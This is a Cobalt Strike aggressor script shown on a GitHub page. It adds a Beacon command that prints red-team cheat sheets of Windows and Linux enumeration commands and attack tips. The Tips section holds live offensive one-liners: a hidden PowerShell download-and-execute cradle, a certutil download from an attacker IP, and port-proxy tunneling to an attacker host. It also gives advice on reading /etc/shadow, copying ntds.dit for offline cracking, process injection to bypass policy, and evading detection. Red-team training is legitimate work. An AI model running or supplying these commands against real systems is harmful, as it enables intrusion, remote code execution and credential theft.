-
Notifications
You must be signed in to change notification settings - Fork 301
/
RedTeamRepo.cna
197 lines (173 loc) · 11 KB
/
RedTeamRepo.cna
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
#RedTeamRepo
#Author: @r3dqu1nn
#A Common Repository for when you forget your RTFM and no googles.
#https://www.sock-raw.org/wiki/doku.php/start - @ithilgore
#http://pwnwiki.io/#!index.md
#https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
#This script will be continuously updated. Any input or feedback is welcomed!! Enjoy and happy hacking!
beacon_command_register("RedRepo", "A large repository of commands and red team tips",
"\nSyntax: RedRepo [Option]\n" .
"\nList Options: RedRepo [List]\n" .
"\nDisplays well known commands for an OS, or diplays great tips or tricks for a Red Team Operator.\n");
alias RedRepo {
if ($2 ismatch 'List') {
local('$out');
#blog($1, "\c0\n\nRepo Options\n============");
$out = "RedRepo Options\n";
$out .= " \c0===============\n\n";
$out .= " Option Description\n";
$out .= "\c0 ------ -----------\n";
blog($1, $out);
blog2($1, "\cBWindows Windows Enumeration Commands");
blog2($1, "\cBLinux Linux Enumeration Commands");
blog2($1, "\cBTips Red Team Tips");
blog2($1, "\cBList List of Options");
blog2($1, "\cBSmile Happy Hacking!\n");
}
if ($2 ismatch 'Windows') {
blog($1, "\t\c4====== Common Windows Commands ======\n");
#WMIC Commands
blog($1, "\t\c4====== WMIC Enumeration Commands ======\n");
blog2($1, "\t\cBwmic computersystem get Name,domain,NumberofProcessors,Roles,totalphysicalmemory");
blog2($1, "\t\cBwmic desktop get Name,ScreenSaverActive,Wallpaper");
blog2($1, "\t\cBwmic netlogin get Caption,Privileges,UserID,UserType,NumberOfLogons,PasswordAge,LogonServer,Workstations");
blog2($1, "\t\cBwmic process get CSName,Description,ExecutablePath,ProcessId");
blog2($1, "\t\cBwmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName");
blog2($1, "\t\cBwmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace");
blog2($1, "\t\cBwmic netuse list full");
blog2($1, "\t\cBwmic startup get Caption,Command,Location,User");
blog2($1, "\t\cBwmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version");
blog2($1, "\t\cBwmic qfe get HotFixID,InstalledOn");
blog2($1, "\t\cBwmic ntdomain list");
blog2($1, "\t\cBwmic bios [list full]\n");
blog($1, "\t\c4====== Info Harvesting ======\n");
#Host Enumeration
blog2($1, "\t\cBsysteminfo");
blog2($1, "\t\cBsysteminfo | findstr /B /C:\"OS Name\" /C:\"OS Version\"");
blog2($1, "\t\cBSET");
blog2($1, "\t\cBipconfig /all");
blog2($1, "\t\cBroute print");
blog2($1, "\t\cBarp -a");
blog2($1, "\t\cBnetstat -ano | findstr /I listening");
blog2($1, "\t\cBnetstat -ano | findstr /I established");
blog2($1, "\t\cBnbtstat -A *target IP*");
blog2($1, "\t\cBnslookup");
blog2($1, "\t\cBreg query [key]");
blog2($1, "\t\cBGet-ItemProperty [key] (PowerShell)");
blog2($1, "\t\cBschtasks /query /fo LIST /v");
blog2($1, "\t\cBsc query");
blog2($1, "\t\cBsc qc [service name]");
blog2($1, "\t\cBtasklist /SVC (/S Remote Computer)");
blog2($1, "\t\cBDRIVERQUERY");
blog2($1, "\t\cBRun C:\\Windows\\System32\\gatherNetworkInfo.vbs script and check results inside C:\\Windows\\System32\\Config");
blog2($1, "\t\cBgpresult /z");
blog2($1, "\t\cBwhoami /all");
blog2($1, "\t\cBnetsh firewall show conf");
blog2($1, "\t\cBnetsh wlan show profiles");
blog2($1, "\t\cBnetsh advfirewall show allprofiles\n");
blog($1, "\t\c4======= Net Commands =======\n");
#Old School Net Commands
blog2($1, "\t\cBnet accounts [/domain]");
blog2($1, "\t\cBnet group \"groupname\" [/domain]");
blog2($1, "\t\cBnet localgroup \"groupname\" [/domain]");
blog2($1, "\t\cBnet view [/domain]");
blog2($1, "\t\cBnet session");
blog2($1, "\t\cBnet share");
blog2($1, "\t\cBnet user [/domain]");
blog2($1, "\t\cBnet user [username] [/domain]");
blog2($1, "\t\cBnet use * \\\\IP\\C$ /user:username [password]");
blog2($1, "\t\cBUse the built in net commands with Beacon! [help net]\n");
}
if ($2 ismatch 'Linux') {
blog($1, "\t\c4====== Common Linux Commands ======\n");
blog($1, "\t\c4====== Info Harvesting/Host/Network Enumeration ======\n")
blog2($1, "\t\cBcat /etc/issue");
blog2($1, "\t\cBcat /etc/*-release");
blog2($1, "\t\cBcat /etc/*-release | grep -E '\"NAME=\"|ID|VERSION|ID_LIKE'");
blog2($1, "\t\cBcat /proc/version");
blog2($1, "\t\cBrpm -q kernel");
blog2($1, "\t\cBdmesg | grep Linux");
blog2($1, "\t\cBls /boot | grep vmlinuz-");
blog2($1, "\t\cBlsb_release -a");
blog2($1, "\t\cBlast -a");
blog2($1, "\t\cBuname -a");
blog2($1, "\t\cBuname -mrs");
blog2($1, "\t\cBid");
blog2($1, "\t\cBhistory");
blog2($1, "\t\cBarp -a");
blog2($1, "\t\cBnetstat -anot");
blog2($1, "\t\cBps -elf");
blog2($1, "\t\cBps -elf | grep root");
blog2($1, "\t\cBls -la /var/www/html/");
blog2($1, "\t\cBservice apache2 status");
blog2($1, "\t\cBcat /etc/resolv.conf");
blog2($1, "\t\cBcat /etc/networks");
blog2($1, "\t\cBiptables -L");
blog2($1, "\t\cBiptables -L -t nat");
blog2($1, "\t\cBlsof -i");
blog2($1, "\t\cBcat /etc/services");
blog2($1, "\t\cBgrep 80 /etc/services");
blog2($1, "\t\cBw");
blog2($1, "\t\cBroute -n");
blog2($1, "\t\cBcat /etc/passwd");
blog2($1, "\t\cBcat /etc/passwd | awk -F : '{if (\$3 > 999 && \$3 < 60001) print \$1,\$3,\$6}'");
blog2($1, "\t\cBcat /etc/motd");
blog2($1, "\t\cBcat /etc/group");
blog2($1, "\t\cBcat /etc/shadow\n");
}
if ($2 ismatch 'Tips') {
blog($1, "\t\c4====== Red Team Tips ======\n");
#Red Tips
blog2($1, "\t\cBhttps://github.com/vysec/RedTips (If you have InterWebs)");
blog2($1, "\t\cBhttps://github.com/subTee/ApplicationWhitelistBypassTechniques/blob/master/TheList.txt (InterWebs Required)");
blog2($1, "\t\cBNeed a map of the network? Run Bloodhound!! https://github.com/BloodHoundAD/BloodHound");
blog2($1, "\t\cBAlways check sysvols!! Domain Controllers will have them, you'll be surprised how some are still viewable by normal users.");
blog2($1, "\t\cBnet user a specific user and see if they are executing any logon scripts, those might contain juicy information.");
blog2($1, "\t\cBAlways check Desktops/Documents/Downloads/Favorites folders for trails of valuable information left behind.");
blog2($1, "\t\cBFind those Fileservers! Sysadmins leave behind all kinds of goodies there.");
blog2($1, "\t\cBUse a Windows 7 workstation to tunnel your traffic natively. netsh int portproxy v4tov4 listenport=[port] connecthost=[AttackerIP] connectport=[port]");
blog2($1, "\t\cBUse certutil.exe -urlcache -split -f [http://AttackerIP/RemoteFile] to download a file to the target machine.");
blog2($1, "\t\cBThe all powerful one-liner powershell.exe -w hidden -nop -ep bypass -c \"IEX ((new-object net.webclient).downloadstring('http://[domainname|IP]:[port]/[file]'))\"");
blog2($1, "\t\cBUse tasklist /S [RemoteComputer] /SVC to see if you have access to that remote machine.");
blog2($1, "\t\cBEnable RDP through the registry: reg add “HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f");
blog2($1, "\t\cBPlease wrap/encode/pack your payloads if you have to drop to disk!");
blog2($1, "\t\cBTry to stay in memory and avoid putting files on disk.");
blog2($1, "\t\cBLive off the land!! Use what is on the target, native windows binaries are very powerful!");
blog2($1, "\t\cBUse AD naming schemes to your advantage, sysadmins are lazy and use organization to help them with all the IT work they do on a daily basis.");
blog2($1, "\t\cBEnterprise Admins will almost always have the rights to move laterally to those foreign domain controllers, 9 times out of 10 they use the same password!");
blog2($1, "\t\cBInvoke-NinjaCopy.ps1 is super powerful and should be used to grab the ntds.dit and SYSTEM files for offline cracking.");
blog2($1, "\t\cBHave multiple points of presence on a network for longer engagements. Persistence can go a long way for Security Operations.");
blog2($1, "\t\cBcmd.exe and powershell.exe blocked by GPO? Find a process that's user owned and started on bootup for process injection to bypass that.");
blog2($1, "\t\cBJust because you acquired initial access doesn't mean you stop doing recon. Network/Host Enumeration is always the most important part.");
blog2($1, "\t\cBInvoke-ReverseDnsLookup.ps1 of powersploit finds those machines on the network that has DNS records and can provide more SA for an attacker.");
blog2($1, "\t\cBNeed a Temporary web server? Use Python! python -m SimpleHTTPServer [port]\n");
}
if ($2 ismatch 'Smile') {
local('$smile');
$smile = "\n";
$smile .= "\t\c9░░░░░░░░░░░███████░░░░░░░░░░░\n";
$smile .= "\t\c9░░░░░░░████░░░░░░░████░░░░░░░\n";
$smile .= "\t\c9░░░░░██░░░░░░░░░░░░░░░██░░░░░\n";
$smile .= "\t\c9░░░██░░░░░░░░░░░░░░░░░░░██░░░\n";
$smile .= "\t\c9░░█░░░░░░░░░░░░░░░░░░░░░░░█░░\n";
$smile .= "\t\c9░█░░████░░░░░░░░██████░░░░░█░\n";
$smile .= "\t\c9█░░█░░░██░░░░░░█░░░░███░░░░░█\n";
$smile .= "\t\c9█░█░░░░░░█░░░░░█░░░░░░░█░░░░█\n";
$smile .= "\t\c9█░█████████░░░░█████████░░░░█\n";
$smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n";
$smile .= "\t\c9█░░░░░░░░░░░░░░░░░░░░░░░░░░░█\n";
$smile .= "\t\c9█░░░████████████████████░░░░█\n";
$smile .= "\t\c9░█░░░█▓▓▓▓▓▓▓▓█████▓▓▓█░░░░█░\n";
$smile .= "\t\c9░█░░░░█▓▓▓▓▓██░░░░██▓██░░░░█░\n";
$smile .= "\t\c9░░█░░░░██▓▓█░░░░░░░▒██░░░░█░░\n";
$smile .= "\t\c9░░░██░░░░██░░░░░░▒██░░░░██░░░\n";
$smile .= "\t\c9░░░░░██░░░░███████░░░░██░░░░░\n";
$smile .= "\t\c9░░░░░░░███░░░░░░░░░███░░░░░░░\n";
$smile .= "\t\c9░░░░░░░░░░█████████░░░░░░░░░░\n";
blog($1, $smile);
}
if ($2 is $null) {
berror($1, "\c4Need to specify additional syntax! Use the 'List' command for help");
blog($1, "\cBSyntax Example: RedRepo Windows");
}
}